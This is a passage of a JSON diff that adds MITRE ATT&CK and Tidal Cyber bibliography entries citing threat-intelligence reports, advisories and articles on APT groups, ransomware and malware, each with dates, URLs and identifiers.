"2014-11-04T00:00:00Z", + "date_published": "2014-05-20T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2014/05/the-pla-and-the-800am-500pm-work-day-fireeye-confirms-dojs-findings-on-apt1-intrusion-activity.html" + ], + "source": "MITRE", + "title": "The PLA and the 8:00am-5:00pm Work Day: FireEye Confirms DOJ’s Findings on APT1 Intrusion Activity" + }, + "related": [], + "uuid": "b8b72a8e-87a1-4ce7-94df-ed938f9eb61c", + "value": "FireEye PLA" + }, + { + "description": "Kaspersky Lab's Global Research & Analysis Team. (2016, August 9). The ProjectSauron APT. Retrieved August 17, 2016.", + "meta": { + "date_accessed": "2016-08-17T00:00:00Z", + "date_published": "2016-08-09T00:00:00Z", + "refs": [ + "https://securelist.com/files/2016/07/The-ProjectSauron-APT_research_KL.pdf" + ], + "source": "MITRE", + "title": "The ProjectSauron APT" + }, + "related": [], + "uuid": "6840c1d6-89dc-4138-99e8-fbd2a45f2a1c", + "value": "Kaspersky ProjectSauron Full Report" + }, + { + "description": "Robert McMillan. (2012, March 3). The Pwn Plug is a little white box that can hack your network. Retrieved March 30, 2018.", + "meta": { + "date_accessed": "2018-03-30T00:00:00Z", + "date_published": "2012-03-03T00:00:00Z", + "refs": [ + "https://arstechnica.com/information-technology/2012/03/the-pwn-plug-is-a-little-white-box-that-can-hack-your-network/" + ], + "source": "MITRE", + "title": "The Pwn Plug is a little white box that can hack your network" + }, + "related": [], + "uuid": "6b57e883-75a1-4a71-accc-2d18148b9c3d", + "value": "McMillan Pwn March 2012" + }, + { + "description": "Ballenthin, W., Tomczak, J.. (2015). The Real Shim Shary. Retrieved May 4, 2020.", + "meta": { + "date_accessed": "2020-05-04T00:00:00Z", + "date_published": "2015-01-01T00:00:00Z", + "refs": [ + "http://files.brucon.org/2015/Tomczak_and_Ballenthin_Shims_for_the_Win.pdf" + ], + "source": "MITRE", + "title": "The Real Shim Shary" + }, + "related": [], + "uuid": "658c8dd6-1a6a-40f0-a7b5-286fd4b1985d", + "value": "FireEye Application Shimming" + }, + { + "description": "Kaspersky Lab's Global Research and Analysis Team. (2014, November 24). THE REGIN PLATFORM NATION-STATE OWNAGE OF GSM NETWORKS. Retrieved December 1, 2014.", + "meta": { + "date_accessed": "2014-12-01T00:00:00Z", + "date_published": "2014-11-24T00:00:00Z", + "refs": [ + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08070305/Kaspersky_Lab_whitepaper_Regin_platform_eng.pdf" + ], + "source": "MITRE", + "title": "THE REGIN PLATFORM NATION-STATE OWNAGE OF GSM NETWORKS" + }, + "related": [], + "uuid": "1b521b76-5b8f-4bd9-b312-7c795fc97898", + "value": "Kaspersky Regin" + }, + { + "description": "T. Richardson, J. Levine, RealVNC Ltd.. (2011, March). The Remote Framebuffer Protocol. Retrieved September 20, 2021.", + "meta": { + "date_accessed": "2021-09-20T00:00:00Z", + "date_published": "2011-03-01T00:00:00Z", + "refs": [ + "https://datatracker.ietf.org/doc/html/rfc6143#section-7.2.2" + ], + "source": "MITRE", + "title": "The Remote Framebuffer Protocol" + }, + "related": [], + "uuid": "4c75a00d-aa90-4260-ab7a-2addc17d1728", + "value": "The Remote Framebuffer Protocol" + }, + { + "description": "Jérôme Segura. (2019, December 4). There's an app for that: web skimmers found on PaaS Heroku. Retrieved August 18, 2022.", + "meta": { + "date_accessed": "2022-08-18T00:00:00Z", + "date_published": "2019-12-04T00:00:00Z", + "refs": [ + "https://www.malwarebytes.com/blog/news/2019/12/theres-an-app-for-that-web-skimmers-found-on-paas-heroku" + ], + "source": "MITRE", + "title": "There's an app for that: web skimmers found on PaaS Heroku" + }, + "related": [], + "uuid": "4656cc2c-aff3-4416-b18d-995876d37e06", + "value": "Malwarebytes Heroku Skimmers" + }, + { + "description": "Howard Oakley. (2020, October 24). There's more to files than data: Extended Attributes. Retrieved October 12, 2021.", + "meta": { + "date_accessed": "2021-10-12T00:00:00Z", + "date_published": "2020-10-24T00:00:00Z", + "refs": [ + "https://eclecticlight.co/2020/10/24/theres-more-to-files-than-data-extended-attributes/" + ], + "source": "MITRE", + "title": "There's more to files than data: Extended Attributes" + }, + "related": [], + "uuid": "e62d67ed-48d0-4141-aacc-92e165d66f16", + "value": "ELC Extended Attributes" + }, + { + "description": "Devon Kerr. (2015). There's Something About WMI. Retrieved May 4, 2020.", + "meta": { + "date_accessed": "2020-05-04T00:00:00Z", + "date_published": "2015-01-01T00:00:00Z", + "refs": [ + "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/sans-dfir-2015.pdf" + ], + "source": "MITRE", + "title": "There's Something About WMI" + }, + "related": [], + "uuid": "a9333ef5-5637-4a4c-9aaf-fdc9daf8b860", + "value": "FireEye WMI SANS 2015" + }, + { + "description": "Daman, R. (2020, February 4). The return of the spoof part 2: Command line spoofing. Retrieved November 19, 2021.", + "meta": { + "date_accessed": "2021-11-19T00:00:00Z", + "date_published": "2020-02-04T00:00:00Z", + "refs": [ + "https://blog.nviso.eu/2020/02/04/the-return-of-the-spoof-part-2-command-line-spoofing/" + ], + "source": "MITRE", + "title": "The return of the spoof part 2: Command line spoofing" + }, + "related": [], + "uuid": "a3fa92ed-763c-4082-8220-cab82d70fad4", + "value": "Nviso Spoof Command Line 2020" + }, + { + "description": "Singh, S. Singh, A. (2020, June 11). The Return on the Higaisa APT. Retrieved March 2, 2021.", + "meta": { + "date_accessed": "2021-03-02T00:00:00Z", + "date_published": "2020-06-11T00:00:00Z", + "refs": [ + "https://www.zscaler.com/blogs/security-research/return-higaisa-apt" + ], + "source": "MITRE", + "title": "The Return on the Higaisa APT" + }, + "related": [], + "uuid": "26d7ee2c-d4f7-441a-9073-49c9049b017e", + "value": "Zscaler Higaisa 2020" + }, + { + "description": "Check Point Research. (2023, August 8). The Rhysida Ransomware: Activity Analysis and Ties to Vice Society. Retrieved August 11, 2023.", + "meta": { + "date_accessed": "2023-08-11T00:00:00Z", + "date_published": "2023-08-08T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://research.checkpoint.com/2023/the-rhysida-ransomware-activity-analysis-and-ties-to-vice-society/" + ], + "source": "Tidal Cyber", + "title": "The Rhysida Ransomware: Activity Analysis and Ties to Vice Society" + }, + "related": [], + "uuid": "0d01416f-4888-4b68-be47-a3245549cec5", + "value": "Check Point Research Rhysida August 08 2023" + }, + { + "description": "The DigiTrust Group. (2017, January 12). The Rise of Agent Tesla. Retrieved November 5, 2018.", + "meta": { + "date_accessed": "2018-11-05T00:00:00Z", + "date_published": "2017-01-12T00:00:00Z", + "refs": [ + "https://www.digitrustgroup.com/agent-tesla-keylogger/" + ], + "source": "MITRE", + "title": "The Rise of Agent Tesla" + }, + "related": [], + "uuid": "dbae7e21-20d4-454c-88db-43e2a195808e", + "value": "DigiTrust Agent Tesla Jan 2017" + }, + { + "description": "Morrow, D. (2021, April 15). The rise of QakBot. Retrieved September 27, 2021.", + "meta": { + "date_accessed": "2021-09-27T00:00:00Z", + "date_published": "2021-04-15T00:00:00Z", + "refs": [ + "https://cybersecurity.att.com/blogs/labs-research/the-rise-of-qakbot" + ], + "source": "MITRE", + "title": "The rise of QakBot" + }, + "related": [], + "uuid": "c7b0b3f3-e9ea-4159-acd1-f6d92ed41828", + "value": "ATT QakBot April 2021" + }, + { + "description": "Cherepanov, A.. (2016, December 13). The rise of TeleBots: Analyzing disruptive KillDisk attacks. Retrieved June 10, 2020.", + "meta": { + "date_accessed": "2020-06-10T00:00:00Z", + "date_published": "2016-12-13T00:00:00Z", + "refs": [ + "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/" + ], + "source": "MITRE", + "title": "The rise of TeleBots: Analyzing disruptive KillDisk attacks" + }, + "related": [], + "uuid": "34e6e415-099a-4f29-aad0-fc0331a733a4", + "value": "ESET Telebots Dec 2016" + }, + { + "description": "Dormann, W. (2015, March 13). The Risks of SSL Inspection. Retrieved April 5, 2016.", + "meta": { + "date_accessed": "2016-04-05T00:00:00Z", + "date_published": "2015-03-13T00:00:00Z", + "refs": [ + "https://insights.sei.cmu.edu/cert/2015/03/the-risks-of-ssl-inspection.html" + ], + "source": "MITRE", + "title": "The Risks of SSL Inspection" + }, + "related": [], + "uuid": "3fafc00e-b808-486e-81bc-c08b6a410133", + "value": "SEI SSL Inspection Risks" + }, + { + "description": "Rootkit Hunter Project. (2018, February 20). The Rootkit Hunter project. Retrieved April 9, 2018.", + "meta": { + "date_accessed": "2018-04-09T00:00:00Z", + "date_published": "2018-02-20T00:00:00Z", + "refs": [ + "http://rkhunter.sourceforge.net" + ], + "source": "MITRE", + "title": "The Rootkit Hunter project" + }, + "related": [], + "uuid": "e52cf1aa-3d14-40ce-a1d4-e9de672261ef", + "value": "SourceForge rkhunter" + }, + { + "description": "Campbell, C. (2014). The Secret Life of Krbtgt. Retrieved December 4, 2014.", + "meta": { + "date_accessed": "2014-12-04T00:00:00Z", + "date_published": "2014-01-01T00:00:00Z", + "refs": [ + "http://defcon.org/images/defcon-22/dc-22-presentations/Campbell/DEFCON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdf" + ], + "source": "MITRE", + "title": "The Secret Life of Krbtgt" + }, + "related": [], + "uuid": "8bef22ff-f2fc-4e1a-b4d2-d746a120f6c6", + "value": "Campbell 2014" + }, + { + "description": "Proofpoint Staff. (2015, December 15). The shadow knows: Malvertising campaigns use domain shadowing to pull in Angler EK. Retrieved October 16, 2020.", + "meta": { + "date_accessed": "2020-10-16T00:00:00Z", + "date_published": "2015-12-15T00:00:00Z", + "refs": [ + "https://www.proofpoint.com/us/threat-insight/post/The-Shadow-Knows" + ], + "source": "MITRE", + "title": "The shadow knows: Malvertising campaigns use domain shadowing to pull in Angler EK" + }, + "related": [], + "uuid": "4653a9a5-95f1-4b02-9bf0-8f1b8cd6c059", + "value": "Proofpoint Domain Shadowing" + }, + { + "description": "Symantec. (2012, August 16). The Shamoon Attacks. Retrieved March 14, 2019.", + "meta": { + "date_accessed": "2019-03-14T00:00:00Z", + "date_published": "2012-08-16T00:00:00Z", + "refs": [ + "https://www.symantec.com/connect/blogs/shamoon-attacks" + ], + "source": "MITRE", + "title": "The Shamoon Attacks" + }, + "related": [], + "uuid": "ac634e99-d951-402b-bb1c-e575753dfda8", + "value": "Symantec Shamoon 2012" + }, + { + "description": "Baumgartner, K.. (2015, June 17). The Spring Dragon APT. Retrieved February 15, 2016.", + "meta": { + "date_accessed": "2016-02-15T00:00:00Z", + "date_published": "2015-06-17T00:00:00Z", + "refs": [ + "https://securelist.com/the-spring-dragon-apt/70726/" + ], + "source": "MITRE", + "title": "The Spring Dragon APT" + }, + "related": [], + "uuid": "2cc38587-a18e-47e9-a8bb-e3498e4737f5", + "value": "Spring Dragon Jun 2015" + }, + { + "description": "Itkin, E. and Cohen, I. (2021, February 22). The Story of Jian – How APT31 Stole and Used an Unknown Equation Group 0-Day. Retrieved March 24, 2021.", + "meta": { + "date_accessed": "2021-03-24T00:00:00Z", + "date_published": "2021-02-22T00:00:00Z", + "refs": [ + "https://research.checkpoint.com/2021/the-story-of-jian/" + ], + "source": "MITRE", + "title": "The Story of Jian – How APT31 Stole and Used an Unknown Equation Group 0-Day" + }, + "related": [], + "uuid": "84ac99ef-106f-44e9-97f0-3eda90570932", + "value": "Check Point APT31 February 2021" + }, + { + "description": "UCF. (n.d.). The system must require username and password to elevate a running application.. Retrieved December 18, 2017.", + "meta": { + "date_accessed": "2017-12-18T00:00:00Z", + "refs": [ + "https://www.stigviewer.com/stig/microsoft_windows_server_2012_member_server/2013-07-25/finding/WN12-CC-000077" + ], + "source": "MITRE", + "title": "The system must require username and password to elevate a running application." + }, + "related": [], + "uuid": "7b895692-d401-4d74-ab3f-e6f8e432877a", + "value": "UCF STIG Elevation Account Enumeration" + }, + { + "description": "Trend Micro. (2012). The Taidoor Campaign. Retrieved November 12, 2014.", + "meta": { + "date_accessed": "2014-11-12T00:00:00Z", + "date_published": "2012-01-01T00:00:00Z", + "refs": [ + "http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp_the_taidoor_campaign.pdf" + ], + "source": "MITRE", + "title": "The Taidoor Campaign" + }, + "related": [], + "uuid": "3d703dfa-97c5-498f-a712-cb4995119297", + "value": "TrendMicro Taidoor" + }, + { + "description": "Nelson, M. (2018, June 11). The Tale of SettingContent-ms Files. Retrieved April 18, 2019.", + "meta": { + "date_accessed": "2019-04-18T00:00:00Z", + "date_published": "2018-06-11T00:00:00Z", + "refs": [ + "https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39" + ], + "source": "MITRE", + "title": "The Tale of SettingContent-ms Files" + }, + "related": [], + "uuid": "88ffa36e-c1d8-4e40-86c9-bdefad9a6c95", + "value": "SpectorOPs SettingContent-ms Jun 2018" + }, + { + "description": "GReAT. (2020, July 14). The Tetrade: Brazilian banking malware goes global. Retrieved November 9, 2020.", + "meta": { + "date_accessed": "2020-11-09T00:00:00Z", + "date_published": "2020-07-14T00:00:00Z", + "refs": [ + "https://securelist.com/the-tetrade-brazilian-banking-malware/97779/" + ], + "source": "MITRE", + "title": "The Tetrade: Brazilian banking malware goes global" + }, + "related": [], + "uuid": "ccc34875-93f3-40ed-a9ee-f31b86708507", + "value": "Securelist Brazilian Banking Malware July 2020" + }, + { + "description": "Symantec Security Response. (2010, January 18). The Trojan.Hydraq Incident. Retrieved February 20, 2018.", + "meta": { + "date_accessed": "2018-02-20T00:00:00Z", + "date_published": "2010-01-18T00:00:00Z", + "refs": [ + "https://www.symantec.com/connect/blogs/trojanhydraq-incident" + ], + "source": "MITRE", + "title": "The Trojan.Hydraq Incident" + }, + "related": [], + "uuid": "10bed842-400f-4276-972d-5fca794ea778", + "value": "Symantec Trojan.Hydraq Jan 2010" + }, + { + "description": "Fidelis Cybersecurity. (2016, February 29). The Turbo Campaign, Featuring Derusbi for 64-bit Linux. Retrieved March 2, 2016.", + "meta": { + "date_accessed": "2016-03-02T00:00:00Z", + "date_published": "2016-02-29T00:00:00Z", + "refs": [ + "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2016/2016.02.29.Turbo_Campaign_Derusbi/TA_Fidelis_Turbo_1602_0.pdf" + ], + "source": "MITRE", + "title": "The Turbo Campaign, Featuring Derusbi for 64-bit Linux" + }, + "related": [], + "uuid": "f19877f1-3e0f-4c68-b6c9-ef5b0bd470ed", + "value": "Fidelis Turbo" + }, + { + "description": "Pompeo, M. (2020, February 20). The United States Condemns Russian Cyber Attack Against the Country of Georgia. Retrieved June 18, 2020.", + "meta": { + "date_accessed": "2020-06-18T00:00:00Z", + "date_published": "2020-02-20T00:00:00Z", + "refs": [ + "https://2017-2021.state.gov/the-united-states-condemns-russian-cyber-attack-against-the-country-of-georgia//index.html" + ], + "source": "MITRE", + "title": "The United States Condemns Russian Cyber Attack Against the Country of Georgia" + }, + "related": [], + "uuid": "fefa7321-cd60-4c7e-a9d5-c723d88013f2", + "value": "USDOJ Sandworm Feb 2020" + }, + { + "description": "Mikhail, K. (2014, October 16). The Ventir Trojan: assemble your MacOS spy. Retrieved April 6, 2018.", + "meta": { + "date_accessed": "2018-04-06T00:00:00Z", + "date_published": "2014-10-16T00:00:00Z", + "refs": [ + "https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/" + ], + "source": "MITRE", + "title": "The Ventir Trojan: assemble your MacOS spy" + }, + "related": [], + "uuid": "5e4e82c0-16b6-43bc-a70d-6b8d55aaef52", + "value": "Securelist Ventir" + }, + { + "description": "Symantec. (2015, January 26). The Waterbug attack group. Retrieved April 10, 2015.", + "meta": { + "date_accessed": "2015-04-10T00:00:00Z", + "date_published": "2015-01-26T00:00:00Z", + "refs": [ + "https://www.threatminer.org/report.php?q=waterbug-attack-group.pdf&y=2015#gsc.tab=0&gsc.q=waterbug-attack-group.pdf&gsc.page=1" + ], + "source": "MITRE", + "title": "The Waterbug attack group" + }, + "related": [], + "uuid": "ec02f951-17b8-44cb-945a-e5c313555124", + "value": "Symantec Waterbug" + }, + { + "description": "Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved December 5, 2014.", + "meta": { + "date_accessed": "2014-12-05T00:00:00Z", + "date_published": "2014-02-02T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120" + ], + "source": "MITRE", + "title": "The Windows NT Command Shell" + }, + "related": [], + "uuid": "aee1e76c-8ff2-4ff0-83e3-edcb76f34d19", + "value": "Windows NT Command Shell" + }, + { + "description": "Arntz, P. (2016, March 30). The Windows Vault . Retrieved November 23, 2020.", + "meta": { + "date_accessed": "2020-11-23T00:00:00Z", + "date_published": "2016-03-30T00:00:00Z", + "refs": [ + "https://blog.malwarebytes.com/101/2016/01/the-windows-vaults/" + ], + "source": "MITRE", + "title": "The Windows Vault" + }, + "related": [], + "uuid": "f09fdc31-38ca-411d-8478-683b08a68535", + "value": "Malwarebytes The Windows Vault" + }, + { + "description": "Microsoft. (2007, August 15). The World of JScript, JavaScript, ECMAScript …. Retrieved June 23, 2020.", + "meta": { + "date_accessed": "2020-06-23T00:00:00Z", + "date_published": "2007-08-15T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/archive/blogs/gauravseth/the-world-of-jscript-javascript-ecmascript" + ], + "source": "MITRE", + "title": "The World of JScript, JavaScript, ECMAScript …" + }, + "related": [], + "uuid": "e3c97d0f-150e-4fe3-a4ce-fc146a2fa718", + "value": "Microsoft JScript 2007" + }, + { + "description": "Mollema, D. (2019, March 4). The worst of both worlds: Combining NTLM Relaying and Kerberos delegation . Retrieved August 15, 2022.", + "meta": { + "date_accessed": "2022-08-15T00:00:00Z", + "date_published": "2019-03-04T00:00:00Z", + "refs": [ + "https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/" + ], + "source": "MITRE", + "title": "The worst of both worlds: Combining NTLM Relaying and Kerberos delegation" + }, + "related": [], + "uuid": "08f44086-2387-4254-a0b6-3b9be2b6ee30", + "value": "ntlm_relaying_kerberos_del" + }, + { + "description": "Mac Threat Response, Mobile Research Team. (2020, August 13). The XCSSET Malware: Inserts Malicious Code Into Xcode Projects, Performs UXSS Backdoor Planting in Safari, and Leverages Two Zero-day Exploits. Retrieved October 5, 2021.", + "meta": { + "date_accessed": "2021-10-05T00:00:00Z", + "date_published": "2020-08-13T00:00:00Z", + "refs": [ + "https://documents.trendmicro.com/assets/pdf/XCSSET_Technical_Brief.pdf" + ], + "source": "MITRE", + "title": "The XCSSET Malware: Inserts Malicious Code Into Xcode Projects, Performs UXSS Backdoor Planting in Safari, and Leverages Two Zero-day Exploits" + }, + "related": [], + "uuid": "0194bb11-8b97-4d61-8ddb-824077edc7db", + "value": "trendmicro xcsset xcode project 2020" + }, + { + "description": "Sean Gallagher, Peter Mackenzie, Elida Leite, Syed Shahram, Bill Kearney, Anand Aijan, Sivagnanam Gn, Suraj Mundalik. (2020, October 14). They’re back: inside a new Ryuk ransomware attack. Retrieved October 14, 2020.", + "meta": { + "date_accessed": "2020-10-14T00:00:00Z", + "date_published": "2020-10-14T00:00:00Z", + "refs": [ + "https://news.sophos.com/en-us/2020/10/14/inside-a-new-ryuk-ransomware-attack/" + ], + "source": "MITRE", + "title": "They’re back: inside a new Ryuk ransomware attack" + }, + "related": [], + "uuid": "bfc6f6fe-b504-4b99-a7c0-1efba08ac14e", + "value": "Sophos New Ryuk Attack October 2020" + }, + { + "description": "Rivner, U., Schwartz, E. (2012). They’re Inside… Now What?. Retrieved November 25, 2016.", + "meta": { + "date_accessed": "2016-11-25T00:00:00Z", + "date_published": "2012-01-01T00:00:00Z", + "refs": [ + "https://www.rsaconference.com/writable/presentations/file_upload/ht-209_rivner_schwartz.pdf" + ], + "source": "MITRE", + "title": "They’re Inside… Now What?" + }, + "related": [], + "uuid": "8330ab88-9c73-4332-97d6-c1fb95b1a155", + "value": "RSA EU12 They're Inside" + }, + { + "description": "Thibault Van Geluwe De Berlaere. (2022, November 8). They See Me Roaming: Following APT29 by Taking a Deeper Look at Windows Credential Roaming. Retrieved November 9, 2022.", + "meta": { + "date_accessed": "2022-11-09T00:00:00Z", + "date_published": "2022-11-08T00:00:00Z", + "refs": [ + "https://www.mandiant.com/resources/blog/apt29-windows-credential-roaming" + ], + "source": "MITRE", + "title": "They See Me Roaming: Following APT29 by Taking a Deeper Look at Windows Credential Roaming" + }, + "related": [], + "uuid": "691fb596-07b6-5c13-9cec-e28530ffde12", + "value": "APT29 Deep Look at Credential Roaming" + }, + { + "description": "Steve Ranger. (2020, February 27). Ransomware victims thought their backups were safe. They were wrong. Retrieved March 21, 2023.", + "meta": { + "date_accessed": "2023-03-21T00:00:00Z", + "refs": [ + "https://www.zdnet.com/article/ransomware-victims-thought-their-backups-were-safe-they-were-wrong/" + ], + "source": "MITRE", + "title": "They were wrong" + }, + "related": [], + "uuid": "301da9c8-60de-58f0-989f-6b504e3457a3", + "value": "ZDNet Ransomware Backups 2020" + }, + { + "description": "Microsoft Defender Research Team. (2018, December 3). Analysis of cyberattack on U.S. think tanks, non-profits, public sector by unidentified attackers. Retrieved April 15, 2019.", + "meta": { + "date_accessed": "2019-04-15T00:00:00Z", + "refs": [ + "https://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/" + ], + "source": "MITRE", + "title": "think tanks, non-profits, public sector by unidentified attackers" + }, + "related": [], + "uuid": "896c88f9-8765-4b60-b679-667b338757e3", + "value": "Microsoft Unidentified Dec 2018" + }, + { + "description": "Zack Whittaker. (2019, August 12). This hacker’s iPhone charging cable can hijack your computer. Retrieved May 25, 2022.", + "meta": { + "date_accessed": "2022-05-25T00:00:00Z", + "date_published": "2019-08-12T00:00:00Z", + "refs": [ + "https://techcrunch.com/2019/08/12/iphone-charging-cable-hack-computer-def-con/" + ], + "source": "MITRE", + "title": "This hacker’s iPhone charging cable can hijack your computer" + }, + "related": [], + "uuid": "b8bb0bc5-e131-47b5-8c42-48cd3dc25250", + "value": "iPhone Charging Cable Hack" + }, + { + "description": "Gyler, C.,Perez D.,Jones, S.,Miller, S.. (2021, February 25). This is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits. Retrieved February 17, 2022.", + "meta": { + "date_accessed": "2022-02-17T00:00:00Z", + "date_published": "2021-02-25T00:00:00Z", + "refs": [ + "https://www.mandiant.com/resources/apt41-initiates-global-intrusion-campaign-using-multiple-exploits" + ], + "source": "MITRE", + "title": "This is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits" + }, + "related": [], + "uuid": "9b75a38e-e5c7-43c8-a7fb-c7f212e00497", + "value": "Mandiant APT41 Global Intrusion" + }, + { + "description": "Glyer, C, et al. (2020, March). This Is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits. Retrieved April 28, 2020.", + "meta": { + "date_accessed": "2020-04-28T00:00:00Z", + "date_published": "2020-03-01T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html" + ], + "source": "MITRE", + "title": "This Is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits" + }, + "related": [], + "uuid": "e4d7c8f6-e202-4aac-b39d-7b2c9c5ea48d", + "value": "FireEye APT41 March 2020" + }, + { + "description": "Merriman, K. and Trouerbach, P. (2022, April 28). This isn't Optimus Prime's Bumblebee but it's Still Transforming. Retrieved August 22, 2022.", + "meta": { + "date_accessed": "2022-08-22T00:00:00Z", + "date_published": "2022-04-28T00:00:00Z", + "refs": [ + "https://www.proofpoint.com/us/blog/threat-insight/bumblebee-is-still-transforming" + ], + "source": "MITRE", + "title": "This isn't Optimus Prime's Bumblebee but it's Still Transforming" + }, + "related": [], + "uuid": "765b0ce9-7305-4b35-b5be-2f6f42339646", + "value": "Proofpoint Bumblebee April 2022" + }, + { + "description": "Itamar Turner-Trauring. (2017, April 18). “This will only hurt for a moment”: code injection on Linux and macOS with LD_PRELOAD. Retrieved December 20, 2017.", + "meta": { + "date_accessed": "2017-12-20T00:00:00Z", + "date_published": "2017-04-18T00:00:00Z", + "refs": [ + "https://www.datawire.io/code-injection-on-linux-and-macos/" + ], + "source": "MITRE", + "title": "“This will only hurt for a moment”: code injection on Linux and macOS with LD_PRELOAD" + }, + "related": [], + "uuid": "82d41fd8-495d-41b6-b908-6ada5764c94d", + "value": "Code Injection on Linux and macOS" + }, + { + "description": "Kizhakkinan, D., et al. (2016, May 11). Threat Actor Leverages Windows Zero-day Exploit in Payment Card Data Attacks. Retrieved February 12, 2018.", + "meta": { + "date_accessed": "2018-02-12T00:00:00Z", + "date_published": "2016-05-11T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2016/05/windows-zero-day-payment-cards.html" + ], + "source": "MITRE", + "title": "Threat Actor Leverages Windows Zero-day Exploit in Payment Card Data Attacks" + }, + "related": [], + "uuid": "2079101c-d988-430a-9082-d25c475b2af5", + "value": "FireEye Fin8 May 2016" + }, + { + "description": "Proofpoint Threat Insight Team. (2019, September 5). Threat Actor Profile: TA407, the Silent Librarian. Retrieved February 3, 2021.", + "meta": { + "date_accessed": "2021-02-03T00:00:00Z", + "date_published": "2019-09-05T00:00:00Z", + "refs": [ + "https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta407-silent-librarian" + ], + "source": "MITRE", + "title": "Threat Actor Profile: TA407, the Silent Librarian" + }, + "related": [], + "uuid": "e787e9af-f496-442a-8b36-16056ff8bfc1", + "value": "Proofpoint TA407 September 2019" + }, + { + "description": "Proofpoint Staff. (2017, September 27). Threat Actor Profile: TA505, From Dridex to GlobeImposter. Retrieved May 28, 2019.", + "meta": { + "date_accessed": "2019-05-28T00:00:00Z", + "date_published": "2017-09-27T00:00:00Z", + "refs": [ + "https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta505-dridex-globeimposter" + ], + "source": "MITRE, Tidal Cyber", + "title": "Threat Actor Profile: TA505, From Dridex to GlobeImposter" + }, + "related": [], + "uuid": "c1fff36f-802b-4436-abce-7f2787c148db", + "value": "Proofpoint TA505 Sep 2017" + }, + { + "description": "Cybersecurity and Infrastructure Security Agency. (2023, July 20). Threat Actors Exploiting Citrix CVE-2023-3519 to Implant Webshells. Retrieved July 24, 2023.", + "meta": { + "date_accessed": "2023-07-24T00:00:00Z", + "date_published": "2023-07-20T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-201a" + ], + "source": "Tidal Cyber", + "title": "Threat Actors Exploiting Citrix CVE-2023-3519 to Implant Webshells" + }, + "related": [], + "uuid": "021c4caa-7a7a-4e49-9c5c-6eec176bf923", + "value": "U.S. CISA CVE-2023-3519 Exploits" + }, + { + "description": "Cybersecurity and Infrastructure Security Agency. (2023, August 1). Threat Actors Exploiting Ivanti EPMM Vulnerabilities. Retrieved August 3, 2023.", + "meta": { + "date_accessed": "2023-08-03T00:00:00Z", + "date_published": "2023-08-01T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-213a" + ], + "source": "Tidal Cyber", + "title": "Threat Actors Exploiting Ivanti EPMM Vulnerabilities" + }, + "related": [], + "uuid": "62305b8a-76c8-49ec-82dc-6756643ccf7a", + "value": "U.S. CISA CVE-2023-35078 Exploits" + }, + { + "description": "Cybersecurity and Infrastructure Security Agency. (2024, February 29). Threat Actors Exploit Multiple Vulnerabilities in Ivanti Connect Secure and Policy Secure Gateways. Retrieved March 1, 2024.", + "meta": { + "date_accessed": "2024-03-01T00:00:00Z", + "date_published": "2024-02-29T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-060b" + ], + "source": "Tidal Cyber", + "title": "Threat Actors Exploit Multiple Vulnerabilities in Ivanti Connect Secure and Policy Secure Gateways" + }, + "related": [], + "uuid": "a501b21d-916d-454e-b5a0-c3d3bdb4e45c", + "value": "U.S. CISA Ivanti Exploits February 2024" + }, + { + "description": "Atlas Cybersecurity. (2021, April 19). Threat Actors use Search-Engine-Optimization Tactics to Redirect Traffic and Install Malware. Retrieved September 30, 2022.", + "meta": { + "date_accessed": "2022-09-30T00:00:00Z", + "date_published": "2021-04-19T00:00:00Z", + "refs": [ + "https://atlas-cybersecurity.com/cyber-threats/threat-actors-use-search-engine-optimization-tactics-to-redirect-traffic-and-install-malware/" + ], + "source": "MITRE", + "title": "Threat Actors use Search-Engine-Optimization Tactics to Redirect Traffic and Install Malware" + }, + "related": [], + "uuid": "26d7134e-7b93-4aa1-a859-03cf964ca1b5", + "value": "Atlas SEO" + }, + { + "description": "Salem, E. (2019, April 25). Threat Actor TA505 Targets Financial Enterprises Using LOLBins and a New Backdoor Malware. Retrieved May 28, 2019.", + "meta": { + "date_accessed": "2019-05-28T00:00:00Z", + "date_published": "2019-04-25T00:00:00Z", + "refs": [ + "https://www.cybereason.com/blog/threat-actor-ta505-targets-financial-enterprises-using-lolbins-and-a-new-backdoor-malware" + ], + "source": "MITRE", + "title": "Threat Actor TA505 Targets Financial Enterprises Using LOLBins and a New Backdoor Malware" + }, + "related": [], + "uuid": "076f2b95-97d2-4d50-bb9b-6199c161e5c6", + "value": "Cybereason TA505 April 2019" + }, + { + "description": "Malhotra, A. (2022, March 15). Threat Advisory: CaddyWiper. Retrieved March 23, 2022.", + "meta": { + "date_accessed": "2022-03-23T00:00:00Z", + "date_published": "2022-03-15T00:00:00Z", + "refs": [ + 